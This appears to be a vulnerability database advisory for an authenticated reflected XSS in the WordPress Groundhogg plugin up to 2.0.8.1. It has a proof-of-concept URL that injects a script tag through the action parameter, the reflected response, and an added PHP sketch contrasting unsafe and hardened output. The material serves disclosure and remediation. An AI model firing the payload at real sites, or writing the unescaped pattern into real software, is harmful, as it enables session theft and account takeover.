Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS



Description
The WordPress Groundhogg plugin, in versions lower than 2.0.8.1, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability.

Proof of Concept
# Exploit Title: Wordpress Groundhogg <= 2.0.8.1 Authenticated Reflected XSS Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 2.0.8.1
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Reflected Cross-site scripting (XSS)
- Using a Wordpress user, access <your_target>/wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts<%2Fscript><script>alert(1)<%2Fscript>
- The response will contain:


bulk_action: 'groundhogg/bulk_job/gh_export_contacts</script><script>alert(1)</script>/ajax', items: bp.getItems(), the_end: bp.isLastOfThem() },
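
The response above shows the `action` value landing inside a single-quoted JavaScript string in an inline script. The following sketch is an added example, not Groundhogg's code and not part of the original submission: it reproduces that output pattern next to a hardened form, and all function names, the `job` variable and the 64-character limit are assumptions made for illustration.

```php
<?php
// Added illustration, not Groundhogg's code. Function names are hypothetical.

// Vulnerable pattern: request value concatenated into a single-quoted JS
// string inside an inline <script>. The HTML parser ends the script element
// at the first "</script>", before JavaScript string quoting is considered.
function render_bulk_action_unsafe(string $action): string
{
    return "<script>var job = { bulk_action: 'groundhogg/bulk_job/"
        . $action . "/ajax' };</script>";
}

// Hardened pattern, step 1: accept only a slug alphabet for the action name.
function normalize_action(string $action): ?string
{
    return preg_match('/\A[a-z0-9_]{1,64}\z/', $action) === 1 ? $action : null;
}

// Hardened pattern, step 2: emit the value as a JSON literal with
// <, >, &, ' and " hex-escaped, so it cannot close the string or the element.
function render_bulk_action_safe(string $action): string
{
    $slug = normalize_action($action);
    if ($slug === null) {
        return '';  // unknown action: render nothing
    }
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $literal = json_encode("groundhogg/bulk_job/{$slug}/ajax", $flags);
    return "<script>var job = { bulk_action: {$literal} };</script>";
}

// Constructed inputs: the decoded query value from the PoC and a normal one.
$samples = [
    'gh_export_contacts</script><script>alert(1)</script>',
    'gh_export_contacts',
];
foreach ($samples as $value) {
    echo "input : {$value}\n";
    echo "unsafe: " . render_bulk_action_unsafe($value) . "\n";
    echo "safe  : " . render_bulk_action_safe($value) . "\n\n";
}
```

Inside WordPress, `sanitize_key()` and `wp_json_encode()` are the usual counterparts to the validation and encoding steps shown here.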

Affects Plugin

References

URL https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-reflected-xss-vulnerability/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter https://twitter.com/LucianNitescu
Views 11662
Verified No
WPVDB ID 9925

Timeline

Publicly Published 2019-10-23 (3 months ago)
Added 2019-10-24 (3 months ago)
Last Updated 2019-11-28 (about 2 months ago)
